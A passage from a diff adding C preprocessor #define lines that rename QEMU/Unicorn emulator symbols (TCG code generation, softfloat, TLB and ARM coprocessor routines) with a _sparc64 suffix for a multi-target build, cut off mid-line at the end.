qstring_new_sparc64 +#define qstring_type qstring_type_sparc64 +#define ram_block_add ram_block_add_sparc64 +#define ram_size ram_size_sparc64 +#define range_compare range_compare_sparc64 +#define range_covers_byte range_covers_byte_sparc64 +#define range_get_last range_get_last_sparc64 +#define range_merge range_merge_sparc64 +#define ranges_can_merge ranges_can_merge_sparc64 +#define raw_read raw_read_sparc64 +#define raw_write raw_write_sparc64 +#define rcon rcon_sparc64 +#define read_raw_cp_reg read_raw_cp_reg_sparc64 +#define recip_estimate recip_estimate_sparc64 +#define recip_sqrt_estimate recip_sqrt_estimate_sparc64 +#define register_cp_regs_for_features register_cp_regs_for_features_sparc64 +#define register_multipage register_multipage_sparc64 +#define register_subpage register_subpage_sparc64 +#define register_tm_clones register_tm_clones_sparc64 +#define register_types_object register_types_object_sparc64 +#define regnames regnames_sparc64 +#define render_memory_region render_memory_region_sparc64 +#define reset_all_temps reset_all_temps_sparc64 +#define reset_temp reset_temp_sparc64 +#define rol32 rol32_sparc64 +#define rol64 rol64_sparc64 +#define ror32 ror32_sparc64 +#define ror64 ror64_sparc64 +#define roundAndPackFloat128 roundAndPackFloat128_sparc64 +#define roundAndPackFloat16 roundAndPackFloat16_sparc64 +#define roundAndPackFloat32 roundAndPackFloat32_sparc64 +#define roundAndPackFloat64 roundAndPackFloat64_sparc64 +#define roundAndPackFloatx80 roundAndPackFloatx80_sparc64 +#define roundAndPackInt32 roundAndPackInt32_sparc64 +#define roundAndPackInt64 roundAndPackInt64_sparc64 +#define roundAndPackUint64 roundAndPackUint64_sparc64 +#define round_to_inf round_to_inf_sparc64 +#define run_on_cpu run_on_cpu_sparc64 +#define s0 s0_sparc64 +#define S0 S0_sparc64 +#define s1 s1_sparc64 +#define S1 S1_sparc64 +#define sa1100_initfn sa1100_initfn_sparc64 +#define sa1110_initfn sa1110_initfn_sparc64 +#define save_globals save_globals_sparc64 +#define scr_write scr_write_sparc64 +#define sctlr_write sctlr_write_sparc64 +#define set_bit set_bit_sparc64 +#define set_bits set_bits_sparc64 +#define set_default_nan_mode set_default_nan_mode_sparc64 +#define set_feature set_feature_sparc64 +#define set_float_detect_tininess set_float_detect_tininess_sparc64 +#define set_float_exception_flags set_float_exception_flags_sparc64 +#define set_float_rounding_mode set_float_rounding_mode_sparc64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_sparc64 +#define set_flush_to_zero set_flush_to_zero_sparc64 +#define set_swi_errno set_swi_errno_sparc64 +#define sextract32 sextract32_sparc64 +#define sextract64 sextract64_sparc64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_sparc64 +#define shift128Right shift128Right_sparc64 +#define shift128RightJamming shift128RightJamming_sparc64 +#define shift32RightJamming shift32RightJamming_sparc64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_sparc64 +#define shift64RightJamming shift64RightJamming_sparc64 +#define shifter_out_im shifter_out_im_sparc64 +#define shortShift128Left shortShift128Left_sparc64 +#define shortShift192Left shortShift192Left_sparc64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_sparc64 +#define size_code_gen_buffer size_code_gen_buffer_sparc64 +#define softmmu_lock_user softmmu_lock_user_sparc64 +#define softmmu_lock_user_string softmmu_lock_user_string_sparc64 +#define softmmu_tget32 softmmu_tget32_sparc64 +#define softmmu_tget8 softmmu_tget8_sparc64 +#define softmmu_tput32 softmmu_tput32_sparc64 +#define softmmu_unlock_user softmmu_unlock_user_sparc64 +#define sort_constraints sort_constraints_sparc64 +#define sp_el0_access sp_el0_access_sparc64 +#define spsel_read spsel_read_sparc64 +#define spsel_write spsel_write_sparc64 +#define start_list start_list_sparc64 +#define stb_p stb_p_sparc64 +#define stb_phys stb_phys_sparc64 +#define stl_be_p stl_be_p_sparc64 +#define stl_be_phys stl_be_phys_sparc64 +#define stl_he_p stl_he_p_sparc64 +#define stl_le_p stl_le_p_sparc64 +#define stl_le_phys stl_le_phys_sparc64 +#define stl_phys stl_phys_sparc64 +#define stl_phys_internal stl_phys_internal_sparc64 +#define stl_phys_notdirty stl_phys_notdirty_sparc64 +#define store_cpu_offset store_cpu_offset_sparc64 +#define store_reg store_reg_sparc64 +#define store_reg_bx store_reg_bx_sparc64 +#define store_reg_from_load store_reg_from_load_sparc64 +#define stq_be_p stq_be_p_sparc64 +#define stq_be_phys stq_be_phys_sparc64 +#define stq_he_p stq_he_p_sparc64 +#define stq_le_p stq_le_p_sparc64 +#define stq_le_phys stq_le_phys_sparc64 +#define stq_phys stq_phys_sparc64 +#define string_input_get_visitor string_input_get_visitor_sparc64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_sparc64 +#define string_input_visitor_new string_input_visitor_new_sparc64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_sparc64 +#define strstart strstart_sparc64 +#define strtosz strtosz_sparc64 +#define strtosz_suffix strtosz_suffix_sparc64 +#define stw_be_p stw_be_p_sparc64 +#define stw_be_phys stw_be_phys_sparc64 +#define stw_he_p stw_he_p_sparc64 +#define stw_le_p stw_le_p_sparc64 +#define stw_le_phys stw_le_phys_sparc64 +#define stw_phys stw_phys_sparc64 +#define stw_phys_internal stw_phys_internal_sparc64 +#define sub128 sub128_sparc64 +#define sub16_sat sub16_sat_sparc64 +#define sub16_usat sub16_usat_sparc64 +#define sub192 sub192_sparc64 +#define sub8_sat sub8_sat_sparc64 +#define sub8_usat sub8_usat_sparc64 +#define subFloat128Sigs subFloat128Sigs_sparc64 +#define subFloat32Sigs subFloat32Sigs_sparc64 +#define subFloat64Sigs subFloat64Sigs_sparc64 +#define subFloatx80Sigs subFloatx80Sigs_sparc64 +#define subpage_accepts subpage_accepts_sparc64 +#define subpage_init subpage_init_sparc64 +#define subpage_ops subpage_ops_sparc64 +#define subpage_read subpage_read_sparc64 +#define subpage_register subpage_register_sparc64 +#define subpage_write subpage_write_sparc64 +#define suffix_mul suffix_mul_sparc64 +#define swap_commutative swap_commutative_sparc64 +#define swap_commutative2 swap_commutative2_sparc64 +#define switch_mode switch_mode_sparc64 +#define switch_v7m_sp switch_v7m_sp_sparc64 +#define syn_aa32_bkpt syn_aa32_bkpt_sparc64 +#define syn_aa32_hvc syn_aa32_hvc_sparc64 +#define syn_aa32_smc syn_aa32_smc_sparc64 +#define syn_aa32_svc syn_aa32_svc_sparc64 +#define syn_breakpoint syn_breakpoint_sparc64 +#define sync_globals sync_globals_sparc64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_sparc64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_sparc64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_sparc64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_sparc64 +#define syn_data_abort syn_data_abort_sparc64 +#define syn_fp_access_trap syn_fp_access_trap_sparc64 +#define syn_insn_abort syn_insn_abort_sparc64 +#define syn_swstep syn_swstep_sparc64 +#define syn_uncategorized syn_uncategorized_sparc64 +#define syn_watchpoint syn_watchpoint_sparc64 +#define syscall_err syscall_err_sparc64 +#define system_bus_class_init system_bus_class_init_sparc64 +#define system_bus_info system_bus_info_sparc64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_sparc64 +#define table_logic_cc table_logic_cc_sparc64 +#define target_parse_constraint target_parse_constraint_sparc64 +#define target_words_bigendian target_words_bigendian_sparc64 +#define tb_add_jump tb_add_jump_sparc64 +#define tb_alloc tb_alloc_sparc64 +#define tb_alloc_page tb_alloc_page_sparc64 +#define tb_check_watchpoint tb_check_watchpoint_sparc64 +#define tb_find_fast tb_find_fast_sparc64 +#define tb_find_pc tb_find_pc_sparc64 +#define tb_find_slow tb_find_slow_sparc64 +#define tb_flush tb_flush_sparc64 +#define tb_flush_jmp_cache tb_flush_jmp_cache_sparc64 +#define tb_free tb_free_sparc64 +#define tb_gen_code tb_gen_code_sparc64 +#define tb_hash_remove tb_hash_remove_sparc64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_sparc64 +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_sparc64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_sparc64 +#define tb_jmp_remove tb_jmp_remove_sparc64 +#define tb_link_page tb_link_page_sparc64 +#define tb_page_remove tb_page_remove_sparc64 +#define tb_phys_hash_func tb_phys_hash_func_sparc64 +#define tb_phys_invalidate tb_phys_invalidate_sparc64 +#define tb_reset_jump tb_reset_jump_sparc64 +#define tb_set_jmp_target tb_set_jmp_target_sparc64 +#define tcg_accel_class_init tcg_accel_class_init_sparc64 +#define tcg_accel_type tcg_accel_type_sparc64 +#define tcg_add_param_i32 tcg_add_param_i32_sparc64 +#define tcg_add_param_i64 tcg_add_param_i64_sparc64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_sparc64 +#define tcg_allowed tcg_allowed_sparc64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_sparc64 +#define tcg_commit tcg_commit_sparc64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_sparc64 +#define tcg_constant_folding tcg_constant_folding_sparc64 +#define tcg_const_i32 tcg_const_i32_sparc64 +#define tcg_const_i64 tcg_const_i64_sparc64 +#define tcg_const_local_i32 tcg_const_local_i32_sparc64 +#define tcg_const_local_i64 tcg_const_local_i64_sparc64 +#define tcg_context_init tcg_context_init_sparc64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_sparc64 +#define tcg_cpu_exec tcg_cpu_exec_sparc64 +#define tcg_current_code_size tcg_current_code_size_sparc64 +#define tcg_dump_info tcg_dump_info_sparc64 +#define tcg_dump_ops tcg_dump_ops_sparc64 +#define tcg_exec_all tcg_exec_all_sparc64 +#define tcg_find_helper tcg_find_helper_sparc64 +#define tcg_func_start tcg_func_start_sparc64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc64 +#define tcg_gen_add_i32 tcg_gen_add_i32_sparc64 +#define tcg_gen_add_i64 tcg_gen_add_i64_sparc64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc64 +#define tcg_gen_and_i32 tcg_gen_and_i32_sparc64 +#define tcg_gen_and_i64 tcg_gen_and_i64_sparc64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_sparc64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc64 +#define tcg_gen_br tcg_gen_br_sparc64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc64 +#define tcg_gen_callN tcg_gen_callN_sparc64 +#define tcg_gen_code tcg_gen_code_sparc64 +#define tcg_gen_code_common tcg_gen_code_common_sparc64 +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_sparc64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_sparc64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_sparc64 +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_sparc64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_sparc64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_sparc64 +#define tcg_gen_ld_i32 tcg_gen_ld_i32_sparc64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc64 +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_sparc64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_sparc64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_sparc64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_sparc64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_sparc64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_sparc64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_sparc64 +#define tcg_gen_not_i32 tcg_gen_not_i32_sparc64 +#define tcg_gen_op0 tcg_gen_op0_sparc64 +#define tcg_gen_op1i tcg_gen_op1i_sparc64 +#define tcg_gen_op2_i32 tcg_gen_op2_i32_sparc64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_sparc64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_sparc64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_sparc64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_sparc64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_sparc64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_sparc64 +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_sparc64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_sparc64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_sparc64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_sparc64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_sparc64 +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_sparc64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_sparc64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc64 +#define tcg_gen_or_i32 tcg_gen_or_i32_sparc64 +#define tcg_gen_or_i64 tcg_gen_or_i64_sparc64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_sparc64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc64 +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc64 +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_sparc64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_sparc64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_sparc64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_sparc64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_sparc64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc64 +#define tcg_gen_st_i32 tcg_gen_st_i32_sparc64 +#define tcg_gen_st_i64 tcg_gen_st_i64_sparc64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_sparc64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_sparc64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_sparc64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_sparc64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_sparc64 +#define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_sparc64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_sparc64 +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_sparc64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_sparc64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_sparc64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_sparc64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_sparc64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_sparc64 +#define tcg_handle_interrupt tcg_handle_interrupt_sparc64 +#define tcg_init tcg_init_sparc64 +#define tcg_invert_cond tcg_invert_cond_sparc64 +#define tcg_la_bb_end tcg_la_bb_end_sparc64 +#define tcg_la_br_end tcg_la_br_end_sparc64 +#define tcg_la_func_end tcg_la_func_end_sparc64 +#define tcg_liveness_analysis tcg_liveness_analysis_sparc64 +#define tcg_malloc tcg_malloc_sparc64 +#define tcg_malloc_internal tcg_malloc_internal_sparc64 +#define tcg_op_defs_org tcg_op_defs_org_sparc64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_sparc64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_sparc64 +#define tcg_optimize tcg_optimize_sparc64 +#define tcg_out16 tcg_out16_sparc64 +#define tcg_out32 tcg_out32_sparc64 +#define tcg_out64 tcg_out64_sparc64 +#define tcg_out8 tcg_out8_sparc64 +#define tcg_out_addi tcg_out_addi_sparc64 +#define tcg_out_branch tcg_out_branch_sparc64 +#define tcg_out_brcond32 tcg_out_brcond32_sparc64 +#define tcg_out_brcond64 tcg_out_brcond64_sparc64 +#define tcg_out_bswap32 tcg_out_bswap32_sparc64 +#define tcg_out_bswap64 tcg_out_bswap64_sparc64 +#define tcg_out_call tcg_out_call_sparc64 +#define tcg_out_cmp tcg_out_cmp_sparc64 +#define tcg_out_ext16s tcg_out_ext16s_sparc64 +#define tcg_out_ext16u tcg_out_ext16u_sparc64 +#define tcg_out_ext32s tcg_out_ext32s_sparc64 +#define tcg_out_ext32u tcg_out_ext32u_sparc64 +#define tcg_out_ext8s tcg_out_ext8s_sparc64 +#define tcg_out_ext8u tcg_out_ext8u_sparc64 +#define tcg_out_jmp tcg_out_jmp_sparc64 +#define tcg_out_jxx tcg_out_jxx_sparc64 +#define tcg_out_label tcg_out_label_sparc64 +#define tcg_out_ld tcg_out_ld_sparc64 +#define tcg_out_modrm tcg_out_modrm_sparc64 +#define tcg_out_modrm_offset tcg_out_modrm_offset_sparc64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_sparc64 +#define tcg_out_mov tcg_out_mov_sparc64 +#define tcg_out_movcond32 tcg_out_movcond32_sparc64 +#define tcg_out_movcond64 tcg_out_movcond64_sparc64 +#define tcg_out_movi tcg_out_movi_sparc64 +#define tcg_out_op tcg_out_op_sparc64 +#define tcg_out_pop tcg_out_pop_sparc64 +#define tcg_out_push tcg_out_push_sparc64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_sparc64 +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_sparc64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_sparc64 +#define tcg_out_qemu_st tcg_out_qemu_st_sparc64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_sparc64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_sparc64 +#define tcg_out_reloc tcg_out_reloc_sparc64 +#define tcg_out_rolw_8 tcg_out_rolw_8_sparc64 +#define tcg_out_setcond32 tcg_out_setcond32_sparc64 +#define tcg_out_setcond64 tcg_out_setcond64_sparc64 +#define tcg_out_shifti tcg_out_shifti_sparc64 +#define tcg_out_st tcg_out_st_sparc64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_sparc64 +#define tcg_out_tb_init tcg_out_tb_init_sparc64 +#define tcg_out_tlb_load tcg_out_tlb_load_sparc64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_sparc64 +#define tcg_patch32 tcg_patch32_sparc64 +#define tcg_patch8 tcg_patch8_sparc64 +#define tcg_pcrel_diff tcg_pcrel_diff_sparc64 +#define tcg_pool_reset tcg_pool_reset_sparc64 +#define tcg_prologue_init tcg_prologue_init_sparc64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_sparc64 +#define tcg_reg_alloc tcg_reg_alloc_sparc64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_sparc64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_sparc64 +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_sparc64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_sparc64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_sparc64 +#define tcg_reg_alloc_start tcg_reg_alloc_start_sparc64 +#define tcg_reg_free tcg_reg_free_sparc64 +#define tcg_reg_sync tcg_reg_sync_sparc64 +#define tcg_set_frame tcg_set_frame_sparc64 +#define tcg_set_nop tcg_set_nop_sparc64 +#define tcg_swap_cond tcg_swap_cond_sparc64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_sparc64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_sparc64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_sparc64 +#define tcg_target_const_match tcg_target_const_match_sparc64 +#define tcg_target_init tcg_target_init_sparc64 +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_sparc64 +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_sparc64 +#define tcg_temp_alloc tcg_temp_alloc_sparc64 +#define tcg_temp_free_i32 tcg_temp_free_i32_sparc64 +#define tcg_temp_free_i64 tcg_temp_free_i64_sparc64 +#define tcg_temp_free_internal tcg_temp_free_internal_sparc64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_sparc64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_sparc64 +#define tcg_temp_new_i32 tcg_temp_new_i32_sparc64 +#define tcg_temp_new_i64 tcg_temp_new_i64_sparc64 +#define tcg_temp_new_internal tcg_temp_new_internal_sparc64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_sparc64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_sparc64 +#define tdb_hash tdb_hash_sparc64 +#define teecr_write teecr_write_sparc64 +#define teehbr_access teehbr_access_sparc64 +#define temp_allocate_frame temp_allocate_frame_sparc64 +#define temp_dead temp_dead_sparc64 +#define temps_are_copies temps_are_copies_sparc64 +#define temp_save temp_save_sparc64 +#define temp_sync temp_sync_sparc64 +#define tgen_arithi tgen_arithi_sparc64 +#define tgen_arithr tgen_arithr_sparc64 +#define thumb2_logic_op thumb2_logic_op_sparc64 +#define ti925t_initfn ti925t_initfn_sparc64 +#define tlb_add_large_page tlb_add_large_page_sparc64 +#define tlb_flush_entry tlb_flush_entry_sparc64 +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_sparc64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_sparc64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_sparc64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_sparc64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_sparc64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_sparc64 +#define tlbiall_is_write tlbiall_is_write_sparc64 +#define tlbiall_write tlbiall_write_sparc64 +#define tlbiasid_is_write tlbiasid_is_write_sparc64 +#define tlbiasid_write tlbiasid_write_sparc64 +#define tlbimvaa_is_write tlbimvaa_is_write_sparc64 +#define tlbimvaa_write tlbimvaa_write_sparc64 +#define tlbimva_is_write tlbimva_is_write_sparc64 +#define tlbimva_write tlbimva_write_sparc64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_sparc64 +#define tlb_protect_code tlb_protect_code_sparc64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_sparc64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_sparc64 +#define tlb_set_dirty tlb_set_dirty_sparc64 +#define tlb_set_dirty1 tlb_set_dirty1_sparc64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_sparc64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_sparc64 +#define token_get_type token_get_type_sparc64 +#define token_get_value token_get_value_sparc64 +#define token_is_escape token_is_escape_sparc64 +#define token_is_keyword token_is_keyword_sparc64 +#define token_is_operator token_is_operator_sparc64 +#define tokens_append_from_iter tokens_append_from_iter_sparc64 +#define to_qiv to_qiv_sparc64 +#define to_qov to_qov_sparc64 +#define tosa_init tosa_init_sparc64 +#define tosa_machine_init tosa_machine_init_sparc64 +#define tswap32 tswap32_sparc64 +#define tswap64 tswap64_sparc64 +#define type_class_get_size type_class_get_size_sparc64 +#define type_get_by_name type_get_by_name_sparc64 +#define type_get_parent type_get_parent_sparc64 +#define type_has_parent type_has_parent_sparc64 +#define type_initialize type_initialize_sparc64 +#define type_initialize_interface type_initialize_interface_sparc64 +#define type_is_ancestor type_is_ancestor_sparc64 +#define type_new type_new_sparc64 +#define type_object_get_size type_object_get_size_sparc64 +#define type_register_internal type_register_internal_sparc64 +#define type_table_add type_table_add_sparc64 +#define type_table_get type_table_get_sparc64 +#define type_table_lookup type_table_lookup_sparc64 +#define uint16_to_float32 uint16_to_float32_sparc64 +#define uint16_to_float64 uint16_to_float64_sparc64 +#define uint32_to_float32 uint32_to_float32_sparc64 +#define uint32_to_float64 uint32_to_float64_sparc64 +#define uint64_to_float128 uint64_to_float128_sparc64 +#define uint64_to_float32 uint64_to_float32_sparc64 +#define uint64_to_float64 uint64_to_float64_sparc64 +#define unassigned_io_ops unassigned_io_ops_sparc64 +#define unassigned_io_read unassigned_io_read_sparc64 +#define unassigned_io_write unassigned_io_write_sparc64 +#define unassigned_mem_accepts unassigned_mem_accepts_sparc64 +#define unassigned_mem_ops unassigned_mem_ops_sparc64 +#define unassigned_mem_read unassigned_mem_read_sparc64 +#define unassigned_mem_write unassigned_mem_write_sparc64 +#define update_spsel update_spsel_sparc64 +#define v6_cp_reginfo v6_cp_reginfo_sparc64 +#define v6k_cp_reginfo v6k_cp_reginfo_sparc64 +#define v7_cp_reginfo v7_cp_reginfo_sparc64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_sparc64 +#define v7m_pop v7m_pop_sparc64 +#define v7m_push v7m_push_sparc64 +#define v8_cp_reginfo v8_cp_reginfo_sparc64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_sparc64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_sparc64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_sparc64 +#define vapa_cp_reginfo vapa_cp_reginfo_sparc64 +#define vbar_write vbar_write_sparc64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_sparc64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_sparc64 +#define vfp_get_fpcr vfp_get_fpcr_sparc64 +#define vfp_get_fpscr vfp_get_fpscr_sparc64 +#define vfp_get_fpsr vfp_get_fpsr_sparc64 +#define vfp_reg_offset vfp_reg_offset_sparc64 +#define vfp_set_fpcr vfp_set_fpcr_sparc64 +#define vfp_set_fpscr vfp_set_fpscr_sparc64 +#define vfp_set_fpsr vfp_set_fpsr_sparc64 +#define visit_end_implicit_struct visit_end_implicit_struct_sparc64 +#define visit_end_list visit_end_list_sparc64 +#define visit_end_struct visit_end_struct_sparc64 +#define visit_end_union visit_end_union_sparc64 +#define visit_get_next_type visit_get_next_type_sparc64 +#define visit_next_list visit_next_list_sparc64 +#define visit_optional visit_optional_sparc64 +#define visit_start_implicit_struct visit_start_implicit_struct_sparc64 +#define visit_start_list visit_start_list_sparc64 +#define visit_start_struct visit_start_struct_sparc64 +#define visit_start_union visit_start_union_sparc64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_sparc64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_sparc64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_sparc64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_sparc64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_sparc64 +#define vmsa_ttbr_write vmsa_ttbr_write_sparc64 +#define write_cpustate_to_list write_cpustate_to_list_sparc64 +#define write_list_to_cpustate write_list_to_cpustate_sparc64 +#define write_raw_cp_reg write_raw_cp_reg_sparc64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_sparc64 +#define x86_op_defs x86_op_defs_sparc64 +#define xpsr_read xpsr_read_sparc64 +#define xpsr_write xpsr_write_sparc64 +#define xscale_cpar_write xscale_cpar_write_sparc64 +#define xscale_cp_reginfo xscale_cp_reginfo_sparc64 +#define cpu_sparc_exec cpu_sparc_exec_sparc64 +#define helper_compute_psr helper_compute_psr_sparc64 +#define helper_compute_C_icc helper_compute_C_icc_sparc64 +#define 